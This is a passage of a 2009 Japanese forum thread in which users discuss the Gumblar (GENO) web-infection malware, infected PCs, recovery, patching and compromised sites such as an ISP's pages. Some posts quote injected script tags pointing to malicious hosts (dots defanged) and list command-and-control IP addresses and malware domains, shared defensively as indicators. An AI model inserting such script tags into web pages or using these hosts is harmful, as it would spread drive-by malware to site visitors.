http://www.ipa.go.jp/security/todoke/
ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・
617名無しさん@お腹いっぱい。:2009/11/02(月) 20:52:12
>>616
報告したならもうそれでいいだろ
>ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・
ってわざわざうrl貼られても困るしここで聞くことじゃない
618名無しさん@お腹いっぱい。:2009/11/02(月) 20:53:53
>>617
それは大変失礼しました。
619名無しさん@お腹いっぱい。:2009/11/02(月) 21:44:39
>>616
どちらでも何らかの対処はされると思います
レンタルサーバ側に直接連絡してもたいていは対応してくれるはず
数日様子見て直らないようならIPAにも連絡すればいいんじゃないかな
620名無しさん@お腹いっぱい。:2009/11/02(月) 22:29:02
ずいぶん情報集まってきたな
http://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/
621名無しさん@お腹いっぱい。:2009/11/03(火) 00:09:53
すみません、情報下さい。
クレクレなのは承知です

デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから
復帰する時にgenoウイルスに感染した様です。
起動すると真っ黒な画面にマウスポインタがポツリ。
セーフモードでも同様。
とにかくデータだけでも救出しようとして、ubuntu 9.04のライブCD挿入。
しかし、エラー多発で起動せず。
前回は動作したのでメディアの問題ではないかと。

で、富士通のサポートHPによると回復できる様ですが、
その際データが消去されないか心配です。
その点については触れられていなかったので・・・
ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。
この場合、データは消去されてしまいますか?

本当に困っています。
釣りではありません。
どうか教えて下さい。
622名無しさん@お腹いっぱい。:2009/11/03(火) 00:41:41
>>621
> デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから
> 復帰する時にgenoウイルスに感染した様です。
このとき感染したんじゃなくてその前から
感染してて復帰タイミングで発病したってだけでしょ

ubuntuの前回使用はいつなの?
メディアの問題じゃないってなんで断言できるの?

コマンドプロンプトからの復帰もしくはリカバリと
https://www.fmworld.net/cs/azbyclub/qanavi/jsp/qacontents.jsp?PID=0408-4161&rid=204#case2-1

コマンドプロンプトの操作だけで復帰できればおそらく問題なし
リカバリが必要だとすればリカバリディスクにバックアップツールがあればできそう
マイリカバリにありそうな感じだけどFMV使ったことないのでわかりません

> ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。
これは何が言いたいのかわかりません。

> 本当に困っています。
だから何?
本当に困っててわからないならどこかに有償サポート求めたほうがいいと思います。
623名無しさん@お腹いっぱい。:2009/11/03(火) 01:16:49
>>622
私の書き込みによって不快にさせてしまいましたか?
もしそうであれば申し訳ありません。

データは消えないという事で、安心しました。明日、ゆっくり対処しようと思います。
それでもダメでしたら、素直にメーカーに修理にだします。
ありがとうございました。

スレ汚しすみませんでした。
624名無しさん@お腹いっぱい。:2009/11/03(火) 04:49:27
管理人が気が付いて対処するまで、新型に感染してたサイトとは知らずに
そのサイトが感染してた期間中頻繁にアクセスしてたので、
今回100%感染したと思ってたのだが、カスペ試用版でスキャンしても何も検出されず、
黒い画面で立ち上がらないという症状もなく、どうやら感染してないようなのですが、
むしろなぜ感染しなかったのか不思議です。

OSはXPSP2で、カスペとは違うアンチウイルスソフトは最新にしていて、
AdobeやWindowsUpdateは最新のものは気が付かなくてあててなくて、
最新のひとつかふたつ前ぐらいのバージョンの状態でした。
Vistaでも感染してる人もいるのに、こんなんでも感染しなかったのが謎ですが、
それともカスペでも検出しないなにかあったりして、実は感染してるとかなのでしょうか?
前回のGENOみたいに、感染したらファイルのサイズが変わるとか
確認できる方法があれば、まだ分かりやすいのにな。
625名無しさん@お腹いっぱい。:2009/11/03(火) 05:07:04
>>624
最新のひとつかふたつ前だったからOKだったんだなきっと
626名無しさん@お腹いっぱい。:2009/11/03(火) 05:36:11
>>625
やはりそう思われますか?
過信はもちろん禁物ですが、今回の新型に限っては
カスペルが感染してたら検出できるようですし
やっぱりギリギリセーフだったのかな?
ということは今回の新型は、最新のひとつかふたつ前より更に前の
脆弱性を狙ったものだったということになるのかもしれませんね。
もちろん自分がたまたまなだけかもしれないし、常に最新にしておくのが当たり前ですが。
627名無しさん@お腹いっぱい。:2009/11/03(火) 07:21:58
いろんなサイトを巡回する人は特に注意
OSとAdobeのアップデート
XPでもFirefox+NoScriptでだいたいは防げる
628名無しさん@お腹いっぱい。:2009/11/03(火) 09:46:35
お客様のPCが起動不能に
どうやらDaonolのようでした
629名無しさん@お腹いっぱい。:2009/11/03(火) 20:06:21
>>624
挿入されたサイトのスクリプトが無効化されたあとのアクセスなら何も起こらない
被害サイトアクセスした時期によるかも

脆弱性はAdobeのものだけじゃなくOSのものも含まれてたんで
更新してなきゃくらってたはず
630名無しさん@お腹いっぱい。:2009/11/03(火) 20:07:24
ついでにこれを機にSP3まであてて最新のパッチを当ててね
631名無しさん@お腹いっぱい。:2009/11/03(火) 21:28:47
>>629
無効化されたあとではなかったみたい。
そのサイトの説明だと、感染して改変されてから5日間くらい気が付かずに、
感染そのままの状態だったようで、その間何度も見にいってたから、
最新にはしてなかったから絶対に感染したと思ってました。
632名無しさん@お腹いっぱい。:2009/11/03(火) 22:47:25
>>631
そのサイトがどこかわからんけど無効化されていたかどうか
実際に見てないならわからないよ
サイト管理者が確認したのは自分のサイトの改変だけじゃないの

実際に有害なのはそのサイト自身ではなく、そこに挿入されてる他所のサーバのスクリプト
自分のサイトは改変されてても挿入元がすでに消去もしくは
コード改変による無効化が行われていたとしたら閲覧したPCに被害は
ないかもしれないってだけだよ
633名無しさん@お腹いっぱい。:2009/11/04(水) 00:00:36
>>632
なるほど!スクリプトなどを書かれてソースコード改変イコール確実に感染
かと勝手に思っていましたが、そのサイト管理人でも気付かないうちに、
挿入元がすでに消去とかされてる場合もあるのですね。
FTPにもかなり何度もアタックがありパスも書き換えられて
盗み見されたようでいたちごっこのようだったとも書かれていたので、
その時間帯も閲覧してたからもうだめぽと思って、カスペルスキーでスキャンかけまくりましたが、
そういう場合もあるのだと初めて分かりました。無知で恥ずかし杉ますが、
分かりやすく何度も教えて下さって本当にありがとうございます。
検出結果もゼロでしたし、感染しなかったんだとようやくこれで安心できそうです。
でもこれからはもっとupdateとか気をつけなければ。
本当にレスありがとうございました。何度もうざい連投すみません。
634名無しさん@お腹いっぱい。:2009/11/04(水) 00:27:03
何度も改ざんされたなら生きてるとこを挿入されそうな気がするけどなあ
ブラウザが古いキャッシュでも見てたのかな
635名無しさん@お腹いっぱい。:2009/11/04(水) 00:29:26
コード改変による無効化って、感染→スクリプト挿入などのコード改変
→更に自動的に無効化?
うーん?

今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、
そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな?
スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、
更に最終的に立ち上がらないようにまでしてしまうということなのかね
仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、
そこで終わってセーフてことか
636名無しさん@お腹いっぱい。:2009/11/04(水) 01:35:36
挿入元の攻撃スクリプトが内紛か何かで無害なコードにおきかわったらしく
それを適当に無効化っていっちゃってるかんじですはい

なんつーかよくわからないまま混乱しちゃってるんじゃないかな
めんどいんで引用で

> 今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、
> そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな?
なんかちょっと違う気もするけどなんとなくはい

> スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、
これはいいえ
脆弱性があってもなくても仕込まれたサイトを閲覧すればスクリプトコードは読み込みに行く
攻撃が失敗か成功かってだけ

> 更に最終的に立ち上がらないようにまでしてしまうということなのかね
これは向こうのミスでそうなってしまったらしい
情報搾取が目的だから起動不能になるのは失敗なはず
ならないパターンもあるかもしれないしないかもしれない

> 仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、
> そこで終わってセーフてことか
まあはい
そのへんはFirefox+NoScriptでブロックってことだけど理解できない人にはおすすめできない

一般ユーザーから見たらOS含めた各種ソフトの更新とセキュリティ対策ソフトを
きちんとインストールってのが基本的な対策なことに変わりはないんで変に混乱する必要はないです
637名無しさん@お腹いっぱい。:2009/11/04(水) 02:40:54
あくまで基本であってこの手の問題は永遠のいたちごっこだからねぇ
今はXPがたまたま脆弱性を突かれただけで
当然この先Vista、W7の脆弱性を狙った新種や派生が次から次と現れてくるだろうから
ネットに繋いでる以上は常にリスクと隣り合わせなんだっていう
自覚を忘れないことが大切だと思うよ
638名無しさん@お腹いっぱい。:2009/11/04(水) 02:45:39
それぞれを最新UPDATEしてたら攻撃されても阻止でき、感染せずにすむってことか
反対に阻止出来ず感染したらカスペスキャンで検出され駆除のパターンてことか
丁寧にサンクス!

>>634
何度もその感染してた期間に閲覧してたみたいだから
古いキャッシュでも見てたというのはさすがにないんじゃないか?
それとも攻撃側がってことか?
639名無しさん@お腹いっぱい。:2009/11/04(水) 03:00:00
だよなー
なんだろうなあ
カスペのスキャンが実は古かったとかないよね
640名無しさん@お腹いっぱい。:2009/11/04(水) 03:04:38
今のところ突かれている脆弱性は既知のものだけなのは幸いだな。
攻撃側も未知の脆弱性を探し出すほどの暇人やスーパークラッカーではないってことだろう。
641名無しさん@お腹いっぱい。:2009/11/04(水) 03:19:32
偶然発見しちゃうときもあるから大丈夫ともいえないけどね
642名無しさん@お腹いっぱい。:2009/11/04(水) 03:33:03
>>639
カスペは試用版ですが、データはもちろん最新にしてスキャンしました。
foxとノースクリプトを使っていたので大丈夫だったのかな?
とも思ったのですが、やっぱり感染してないのがおかしいみたいですよね…。
やっぱり安心せずにリカバリするべきなのかな…。
643名無しさん@お腹いっぱい。:2009/11/04(水) 03:36:31
今回の新型、今までのレスとか情報を見ると、カスペルスキーで検知された場合には
gumblarで検知されて駆除されるんだよね
実際にカスペルスキーで見つかって駆除した人いないかな?
644名無しさん@お腹いっぱい。:2009/11/04(水) 03:39:13
>>642
NoScript使ってたなら普段のドメインとは別の見知らぬドメインがブロックされてたはず
それで大丈夫だったのかも
まあ心配ならリカバリが一番安全安心確実
645名無しさん@お腹いっぱい。:2009/11/04(水) 03:48:40
ちと疑問
新型GENOは、感染してからファイルやデータを
バックアップしても平気というか間に合うのか?
646名無しさん@お腹いっぱい。:2009/11/04(水) 07:23:33
GENOはBIOSやブートセクタや他のファイルを書き換えてくタイプでないし
リストアする際にレジストリを復元しない限り不活性化されたまんまHDDに残るんでないかい?
647名無しさん@お腹いっぱい。:2009/11/04(水) 08:13:05
>>583
おれもWindows7で同じような状態になっちゃったんだけど、それGENOウィルスじゃないかもしれない
もしかしてWindowsの方のセキュリティにあるアクセス許可、AdministratorsとかSYSTEMとかを変えたりしなかった?
648名無しさん@お腹いっぱい。:2009/11/04(水) 16:41:38
>>646
不活性化されたまんまHDDに残るを詳しく頼む
649名無しさん@お腹いっぱい。:2009/11/04(水) 16:53:48
そのまんまだよ
動かないけどファイルは残ってるってこと
650名無しさん@お腹いっぱい。:2009/11/04(水) 18:08:37
バックアップデータをリカバリしたパソコンに戻しても大丈夫だが、
もしかしたら攻撃の痕跡が残ってるファイルがあるかもなってことだ
651名無しさん@お腹いっぱい。:2009/11/04(水) 23:35:48
でもレジストリまでそのままリストアしたらアウトってこと
レジストリ内にGENOを起動させる設定があるからね
きちんと修正したレジストリならば戻しても大丈夫じゃないかな
652名無しさん@お腹いっぱい。:2009/11/05(木) 00:29:50
レジストリをいじるプログラムなんかをその感染後にバックアップした中から
また入れなおすときには要注意ってことかなるほど
653名無しさん@お腹いっぱい。:2009/11/05(木) 00:36:33
レジストリいじるのって、簡単に言うなら例えばexe系プログラム等だもんな。
画像ファイルやテキストワードファイルや音楽ファイルなんかは
それ自体はレジストリいじるのはあまりないだろうし、
それらを動かす為のプログラムは新しくダウンしてインスコなりすれば問題なさそうだな。
詳しい人には散々既出かもしれないが、大分色々わかってきてとても有難い。
654名無しさん@お腹いっぱい。:2009/11/05(木) 00:48:59
ほんとにわかってるのかすごく心配になる文章だな
つーか何を言いたいのか1回読んだだけじゃまったく理解できん

とりあえず1行目のは実行ファイルっていえばいいんじゃね
655名無しさん@お腹いっぱい。:2009/11/05(木) 00:58:58
実行ファイルじゃなくてレジストリに設定を保存するソフトウェアのようなことを言ってるのかな
やっと解読できた

Genoの場合もそうだけどウイルスはドライバとしてロードされる部分に
埋め込まれることが多いからちょっと違う場所なんだけどね
まあレジストリは下手にいじると本当に危ないんで注意してください
656名無しさん@お腹いっぱい。:2009/11/05(木) 10:00:18
//404の中身が変わって、有害化してるらしい。
中にはLocationヘッドで違うページに転送してそこに難読化したスクリプトが置いてあるのもある。
657名無しさん@お腹いっぱい。:2009/11/05(木) 14:13:21
>>656 のとおり、
一時期無害化されていたGumblar.xが攻撃再開。ご注意を。
658名無しさん@お腹いっぱい。:2009/11/07(土) 08:54:42
こんなの貼られてた
Hは半角小文字、前後のスペースなし
●は.で

</head>

<script src= H ttp://christinateatern●se/images/kartachristina●jpg-for-web-small●php ></script><body>
659名無しさん@お腹いっぱい。:2009/11/07(土) 16:41:42
Google Chormeでのweb巡回でもGENO対策になりますか・・・

横レススマソ
660名無しさん@お腹いっぱい。:2009/11/07(土) 17:12:22
いいえ
どこが横レスなのかわからん

Google Safe Brwosingで既知の危険サイトはブロックするかもしれないけど
新型感染サイトはブロックされない可能性がある

まずは各種ソフトウェアの更新をしっかりやってください
661名無しさん@お腹いっぱい。:2009/11/07(土) 17:25:48
ソフトウェアの更新については>>359あたり参照
今のところ直接関係はないけどJavaランタイムはVersion 6 Update 17が最新
662名無しさん@お腹いっぱい。:2009/11/08(日) 13:15:38
Javaランタイムのバージョン確認方法は
663名無しさん@お腹いっぱい。:2009/11/08(日) 14:00:58
>>662
サイトくらい見ればいいのに
http://www.java.com/ja/download/installed.jsp

あと設定→コントロールパネル→Java→
基本タブにあるバージョン情報ボタンクリック
664名無しさん@お腹いっぱい。:2009/11/08(日) 21:01:02
バージョンすら確認出来ないのにネットやってて大丈夫なのかよw
665名無しさん@お腹いっぱい。:2009/11/09(月) 18:28:40
あったりまえじゃん! ぜーんぜんへーきさ
666名無しさん@お腹いっぱい。:2009/11/09(月) 19:30:54
立命館大学の学園祭HPが感染したってマジか?
667名無しさん@お腹いっぱい。:2009/11/09(月) 20:56:59
>>666
貴方↓の中の人ですか?
ttp://www3.atword.jp/gnome/2009/11/08/warning-ritsumeikan-univ-festival-site-compromized-by-gumblar/
Gumblar.xですか。
ソースチェカー
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.rits-fes-by-e2.net%2F&hua=
Googleから行くと弾かれますね。

立命館大学衣笠学園祭事務局 問い合わせ
ttp://www.rits-fes.net/mail/index.html
TEL/FAX:075-465-7891

電話で教えて差し上げましたが対応が最悪です。
挙句の果てに電話を切られました。もうね、アホかとw
668名無しさん@お腹いっぱい。:2009/11/09(月) 21:06:39
うほwwwwwがっつり感染しとるwww
669名無しさん@お腹いっぱい。:2009/11/09(月) 21:12:18
>>667
今行くと404が出るからやっと対応したのかな?
でも今日の時点でアクセスカウンターが3万行ってたんだから
きちんと経緯とかを説明して欲しいね
670名無しさん@お腹いっぱい。:2009/11/09(月) 21:39:18
中の人ならいまさらマジかっていわないだろwww
671名無しさん@お腹いっぱい。:2009/11/09(月) 21:51:07
【セキュリティ】マルウェア「Gumblar」のホーム・ドメインが復活 (09/11/09)
http://pc11.2ch.net/test/read.cgi/pcnews/1257767416/
672名無しさん@お腹いっぱい。:2009/11/09(月) 23:21:36
>>671
難しくてわからない
3行にまとめて下さい
673名無しさん@お腹いっぱい。:2009/11/10(火) 18:53:13
ttp://www.google.co.jp/search?hl=ja&rlz=1R2ADBR_ja&q=%E7%AB%8B%E5%91%BD%E9%A4%A8%E5%A4%A7%E5%AD%A6BKC%E5%AD%A6%E5%9C%92%E7%A5%AD%E4%BA%8B%E5%8B%99%E5%B1%80+077-561-3990&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
立命館大学BKC学園祭事務局 TEL:077-561-3990

に電話をしたところ、話の途中でFAX回線に切り替えられましたw
ピーピロピロピーってorz

[PDF] 立命館大学に於ける 情報セキュリティ対策の現状と課題
ttp://www.nii.ac.jp/csi/upki/secsem/2009/Secsem2009/seminar_04.pdf
カタカナ英語使えばいいってもんじゃないっしょww
674名無しさん@お腹いっぱい。:2009/11/10(火) 20:14:45
関西の大学に常識的な対応を期待するなよ
675名無しさん@お腹いっぱい。:2009/11/13(金) 16:15:20
majormess.nlってのもGENOの亜種ですか?
またクロームで警告あったんですが・・
676名無しさん@お腹いっぱい。:2009/11/14(土) 01:32:49
今回のGumblarは感染した別サイトにウイルス置いてばらまかせる仕様だし、被害者兼加害者かも?
677名無しさん@お腹いっぱい。:2009/11/14(土) 01:52:16
そこからさらに亜種も派生してさらに蔓延すると
今回はLoveLetter以来のかなり悪質なものだね
678名無しさん@お腹いっぱい。:2009/11/14(土) 15:17:39
巻き込み規制喰らってるので携帯からorz

ttp://www●interq●or●jp/
Redirectにコードが仕込んであるっぽい
--
<meta http-equiv="refresh" CONTENT="0;URL=http://members●interq●or●jp/">
</head>
<script src=http://ykcv●org/upload_data/blogslideconf/hvkh●php ></script><body>
--
ttp://ykcv●org/upload_data/blogslideconf/hvkh●php

ttp://forgottenchild●in/fieldtrips/shareyourlove●php

業種的にやばすぎるというか
終わってるだろ・・・
679名無しさん@お腹いっぱい。:2009/11/14(土) 16:56:08
>>678
今ソース見てきたけど、直ってね?
680名無しさん@お腹いっぱい。:2009/11/14(土) 17:38:53
>>678

Gumblar再来襲。interQのホームページスペース「404エラー」改ざん
ttp://blogs.yahoo.co.jp/noooo_spam/59139250.html

404も改ざんされてたらしいけど、今はどうなんだろ?
681679:2009/11/14(土) 18:33:50
ありゃ、>>678のソースが復活してら。駄目だねこりゃ。
682名無しさん@お腹いっぱい。:2009/11/14(土) 18:44:30
Welcome to Oriental Tunes

Dear Visitor

You have requested a page or file that does not exist on the site you came from.
You can proceed to Oriental Tunes and look for that file on our site.
683名無しさん@お腹いっぱい。:2009/11/15(日) 00:08:40
ISPのシス管感染ワロス
自社オプションサービスのウィルスチェックしてみればいいのにね
684名無しさん@お腹いっぱい。:2009/11/15(日) 01:01:02
さすがは悪名高いinterQ・・・
685名無しさん@お腹いっぱい。:2009/11/15(日) 01:24:28
修正→改竄→再修正→再改竄→再々修正→再々改竄→再々再修正・・・
無限ループすんなよwww

interQ\(^o^)/オワタ
686名無しさん@お腹いっぱい。:2009/11/15(日) 03:07:43
無限ループしてる=シス管がGumblarの対処法を知らない

いくら何でも致命的すぎないか……?
687名無しさん@お腹いっぱい。:2009/11/15(日) 06:59:43
セーフ ブラウジング
interq.or.jp の診断ページ
http://www.google.com/safebrowsing/diagnostic?site=http://interq.or.jp&hl=ja
不正なソフトウェアは uco-squad●com/, jgreenjewelers●net/, velassin●com/ を含む 3 個のドメインでホストされています。

AS7506 (INTERQ).
http://www.google.com/safebrowsing/diagnostic?site=AS:7506&hl=ja

※コメントは省略す(苦笑
688名無しさん@お腹いっぱい。:2009/11/15(日) 08:11:16
interqなんてDQNしか使わないよ
よって影響なし
689名無しさん@お腹いっぱい。:2009/11/15(日) 11:03:23
DQNが使うからよけいやばくね?
690名無しさん@お腹いっぱい。:2009/11/15(日) 13:31:28
見る方はどうなるw
691名無しさん@お腹いっぱい。:2009/11/15(日) 15:56:07
告知しないで放置してるやつ、HP消して逃げるやつは
罰せられるべきでは無いだろうか? 尻叩き1万発とかw
692678:2009/11/15(日) 18:25:06
[お知らせ]
2009年05月21日(木)
【重要】Web閲覧によるウイルス感染について
ttp://support.gmo.jp/members/topics/20090521.php

5月に「感染予防策」まで書いてるのに、テメェらのPCが感染って
どんだけバカなんだよwwwwwww
693名無しさん@お腹いっぱい。:2009/11/15(日) 19:04:14
Gumblar再来襲。interQのホームページスペース「404エラー」改ざん ...
ttp://blogs.yahoo.co.jp/noooo_spam/59139250.html
694名無しさん@お腹いっぱい。:2009/11/16(月) 04:12:19
>>687
http://www.google.com/safebrowsing/diagnostic?site=http://www.google.com&hl=ja
有害な不正ソフトの感染を広げる媒介をしていたかどうか
過去 90 日に、www.google.com は bia2samapc.ir/, debsh2.mihanblog.com/ を含む 2 サイトの感染媒体として機能していたようです。
695名無しさん@お腹いっぱい。:2009/11/16(月) 05:01:48
interQかw
Q2とかなんとかダイアルみたいなのが全盛の頃を思い出すわ
696名無しさん@お腹いっぱい。:2009/11/16(月) 09:29:28
>>694
http://www.google.com/safebrowsing/diagnostic?site=http://maps.google.com&hl=ja
不正なソフトウェアは mycomputer-scannervv.com/, spywarepc.info/, boy-meets-world.com/ を含む 3 個のドメインでホストされています。
spywarepc.info/, boy-meets-world.com/, tawatchai.com/ を含む 3 個のドメインが、
このサイトの訪問者に不正なソフトウェアを配布する媒体として機能しているようです。

Googleさん何やってるんですか〜
697名無しさん@お腹いっぱい。:2009/11/16(月) 17:56:11
GMOに凸完了
698名無しさん@お腹いっぱい。:2009/11/17(火) 04:51:20
test
699名無しさん@お腹いっぱい。:2009/11/17(火) 13:47:24
interQのリダイレクトページ、こっそり撤去したなw

[続報] Gumblar に酷似、新たな脅威発生に警告
ttp://www.kaspersky.co.jp/news?id=207578791
10 月 14 日にこのマルウェアを検知してから、
11 月 16 日現在まででカスペルスキーでは既に国内の 1250 以上の感染サイトを確認しており、
先月 22 日当該脅威の発表時点より 20 倍以上の感染となっています。
動画サイトやゴルフ関連サイト、神社や空港に至るさまざまな日本のサイトにおいて感染が確認されており、
十分な警戒が必要です。現在、大手 ISP や管理機関と共に、
感染サイトのテイクダウン(閉鎖)に関する連携を行っています。
従来のガンブラーと比較して、調査を阻害するような機能が強化されていることが確認されています。
このため、現時点ではほとんどのウィルス対策ソフトが対応できていない状態であり、十分な注意が必要です。
700名無しさん@お腹いっぱい。:2009/11/17(火) 14:38:33
>神社や空港

おっかねーなあ。おちおちネサフも出来やしねえ
っていうか、動画サイトってどこが引っかかってるんだ?つべクラスではさすがに無いだろうから中韓とかのやつ?
701名無しさん@お腹いっぱい。:2009/11/17(火) 16:28:02
「Gumblar」酷似ウイルス被害拡大、国内1250サイト以上改ざん

Kaspersky Labs Japanは16日、
今年の春に猛威を振るった「Gumblar(ガンブラー)」に酷似したマルウェア
「Trojan-Downloader.JS.Gumblar.x」による被害が拡大しているとして注意喚起した。
16日までに国内で1250以上のサイトが改ざんされ、マルウェアを仕込まれているという。

http://internet.watch.impress.co.jp/docs/news/20091117_329507.html
702名無しさん@お腹いっぱい。:2009/11/17(火) 17:03:02
感染サイト一覧を公開しろよ
やくにたたねー情報だけ出しやがって
703名無しさん@お腹いっぱい。:2009/11/17(火) 17:04:05
そんなん出したら名誉毀損や営業妨害になりますし
704名無しさん@お腹いっぱい。:2009/11/17(火) 17:09:55
なして?
705名無しさん@お腹いっぱい。:2009/11/17(火) 17:37:07
名誉ではない
虚偽の情報ではない
706名無しさん@お腹いっぱい。:2009/11/17(火) 17:40:00
>名誉毀損や営業妨害になりますし
それは極端かもしれんけど
余計なことすると逆にカスペルが企業側から訴えられたりするだろうからな
冷静な判断かもしれん
707名無しさん@お腹いっぱい。:2009/11/17(火) 17:44:54
じゃここで伏字して晒そうや
708名無しさん@お腹いっぱい。:2009/11/17(火) 18:38:57
大企業や有名どころなら伏せる必要もないんじゃねえの
小林製薬やGENO(笑)だって散々書かれてたぞ
709名無しさん@お腹いっぱい。:2009/11/17(火) 19:09:05
個人が書くのと企業が書くのとではいろいろとな…。
710名無しさん@お腹いっぱい。:2009/11/17(火) 19:10:48
>>709
つい最近の居酒屋チェーン同士のケンカですねわかります
711名無しさん@お腹いっぱい。:2009/11/17(火) 19:46:41
interDQNの方が相応しいよなw
712名無しさん@お腹いっぱい。:2009/11/17(火) 23:05:25
>>700
絶対に安全なサイトなんてないだろうがつべは困るな。実家の母親が最近はまってるらしくてな・・・
713名無しさん@お腹いっぱい。:2009/11/17(火) 23:50:45
過去に動画サイトでこのウイルスが感染したことあったっけ?
714名無しさん@お腹いっぱい。:2009/11/17(火) 23:58:53
知らないけど原理的にはサイトの内容は関係ないのでないとはいえないと思う
715名無しさん@お腹いっぱい。:2009/11/18(水) 01:39:08
動画サイトの感染あったよね。
サイト自体はちゃんと感染公表して対応もしたから今は大丈夫でしょう。
716名無しさん@お腹いっぱい。:2009/11/18(水) 02:28:48
前にSayMoveがやられてたね
717名無しさん@お腹いっぱい。:2009/11/18(水) 18:58:29
ニコ動も感染してなかった?
718名無しさん@お腹いっぱい。:2009/11/18(水) 19:15:17
2chもやられたもより
janeの緊急うpだてで対応済の件w
3月の話w
719名無しさん@お腹いっぱい。:2009/11/18(水) 19:22:02
ヽ(`Д´)ノボッキアゲ
720名無しさん@お腹いっぱい。:2009/11/18(水) 19:55:15
janeもアップデートしておいたほうがよさそうだな。
721名無しさん@お腹いっぱい。:2009/11/18(水) 19:57:08
俺もいい加減かちゅーしゃから別の専ブラに変えないと…
722名無しさん@お腹いっぱい。:2009/11/18(水) 20:28:02
Jane Styleの対応バージョンは
3.1.1.0 かと思われ
Jane Style 公式サイトには
なぜか無いw
723名無しさん@お腹いっぱい。:2009/11/18(水) 20:52:25
>>718
初耳
724名無しさん@お腹いっぱい。:2009/11/18(水) 21:13:54
はっきり言って、定かじゃない
ただ、特定のスレを読み込み
リダイレクトされた気配

janeには、無関係なdatを読み込む脆弱性があったとか
修正されたとか
725名無しさん@お腹いっぱい。:2009/11/18(水) 21:58:03
なにそれこわい
726名無しさん@お腹いっぱい。:2009/11/18(水) 22:29:37
BIG-serverの障害情報に載ってたね。>>718
運用情報板でFTP禁止になった。(特にFFFTP)
私もSCPにしろって言われて変えた。
727名無しさん@お腹いっぱい。:2009/11/18(水) 22:35:32
2chがサーバを借りているところのサーバはやられたけど
2chのサーバは無事だった

また、修正されたJaneの脆弱性はここで扱っているマルウェアとは無関係
728名無しさん@お腹いっぱい。:2009/11/19(木) 06:16:02
サイト管理側は再発とかたまったものじゃないだろうな
閲覧する側はupdateの類を怠っていなければほぼ安全だが
729名無しさん@お腹いっぱい。:2009/11/19(木) 07:59:26
再発は管理する側が使用するPCでのセキュリティ・updateの類を怠っているからだが・・
730名無しさん@お腹いっぱい。:2009/11/20(金) 00:38:30
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2071
>攻撃再開後の今月12日には、GMOインターネット(本社:東京都渋谷区)の
インターネット・サービス・プロバイダ「InterQ」のメンバーサイトが改ざん

interQ(DQN)は「告知(お詫び)」しないのか?
731名無しさん@お腹いっぱい。:2009/11/20(金) 00:51:04
CycleWorldも「告知(お詫び)」してないな。
732名無しさん@お腹いっぱい。:2009/11/20(金) 02:28:15
会員制のページで感染とか無茶苦茶だな。InterQ。
733名無しさん@お腹いっぱい。:2009/11/20(金) 10:06:07
所詮は悪徳業者
734名無しさん@お腹いっぱい。:2009/11/20(金) 12:02:02
下手に告知すると今まで知らなかった人まで騒ぎ出し不利益になる
とかおもってんじゃね
もしくはユーザーなめられてる
735名無しさん@お腹いっぱい。:2009/11/20(金) 15:17:37
注意喚起】Gumblarおよびその亜種に関する大量の感染事例について
http://www.lac.co.jp/info/alert/alert20091119.html

.>感染した際にアクセスする送信先のIPアドレス:
216.45.48.66/32
195.24.76.250/32
67.215.246.34/32
67.215.238.194/32

とりあえずこのIPへのアクセス遮断しとけば
万が一感染しても情報は抜かれないってこと?
736名無しさん@お腹いっぱい。:2009/11/20(金) 16:49:08
botnetみたいになっちゃってるから今後いくらでも新しい接続先が出てくるだろうな
いちいちブロックしてもあまり効果はないよ
737735:2009/11/20(金) 18:53:27
>>736
やっぱそうか、トン
738名無しさん@お腹いっぱい。:2009/11/20(金) 20:55:18
ていうかCycleWorld、ブログに付いたコメ消してない?
告知しろみたいなコメが付いてたと思ったんだが…
最悪だな
739名無しさん@お腹いっぱい。:2009/11/22(日) 22:24:48
全てGENOのせいだ
GENO写真は死んで詫びろ!賠償金払え!
740名無しさん@お腹いっぱい。:2009/11/23(月) 09:01:14
国民のための情報セキュリティサイト by 総務省

http://www.soumu.go.jp/main_sosiki/joho_tsusin/security/index.htm

久々に見たらもう放置状態?

 世の中が騒がしくなってセキュリティ意識どころでは
 なくなって行った、ということでしょうかね・・・
741名無しさん@お腹いっぱい。:2009/11/23(月) 10:36:02
友愛に替わったせいじゃね?
742名無しさん@お腹いっぱい。:2009/11/23(月) 10:36:03
民主によって予算削減されたので更新しません
743名無しさん@お腹いっぱい。:2009/11/23(月) 18:13:58
皆様に質問です。
素人考えですがサイト改竄対策としてftpaccessの設置がいいんじゃないかと思うのですが、
これについて触れているサイト(情報)がないのは有効じゃないから?
744名無しさん@お腹いっぱい。:2009/11/23(月) 18:51:04
パソコンなんてオタクが使うものだし
そんなところに割く予算なんて無いんだよ
745名無しさん@お腹いっぱい。:2009/11/23(月) 19:16:52
746名無しさん@お腹いっぱい。:2009/11/23(月) 19:34:06
人柱が出るまでURLはスルーします
747名無しさん@お腹いっぱい。:2009/11/23(月) 19:37:04
virustotalまで疑ってるのかよ
748名無しさん@お腹いっぱい。:2009/11/23(月) 19:43:50
都合が悪い結果が出てるんだろうなw
749名無しさん@お腹いっぱい。:2009/11/23(月) 19:45:59
また何でもかんでもGENO厨が現れたな
750名無しさん@お腹いっぱい。:2009/11/23(月) 19:59:31
>>746
VirusTotalくらい知っといて損はないよ
751名無しさん@お腹いっぱい。:2009/11/23(月) 20:37:25
>>746

ウイルス対策ソフトを入れていない人だな。
752名無しさん@お腹いっぱい。:2009/11/24(火) 02:36:15
セーフ ブラウジング - ivyfancl.com の診断ページ
http://www.google.com/safebrowsing/diagnostic?site=ivyfancl.com/&hl=ja
